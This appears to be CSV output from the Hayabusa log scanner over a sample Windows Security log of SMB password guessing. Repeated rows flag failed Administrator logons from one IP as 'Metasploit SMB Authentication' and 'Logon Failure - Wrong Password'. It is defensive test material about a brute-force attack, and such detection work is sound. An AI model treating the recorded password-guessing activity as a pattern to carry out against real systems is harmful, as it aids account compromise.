NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
